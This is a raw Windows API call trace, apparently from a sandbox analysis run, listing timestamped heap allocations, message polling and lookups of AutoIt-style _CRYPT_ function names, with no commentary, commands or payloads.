HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x33fc) returned 0x3bf3458 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x33fc) returned 0x3bf0050 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0158.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0158.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0158.569] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x33fc) returned 0x3bf0050 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0158.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0158.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0158.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x33fc) returned 0x3bf6860 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0158.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0158.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0158.571] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.571] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0158.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0158.573] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0158.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0158.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0158.574] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0158.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0158.574] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0158.574] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0158.574] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0158.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0158.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0158.575] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.575] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.575] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0158.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0158.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0158.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0158.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0158.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0158.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0158.576] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 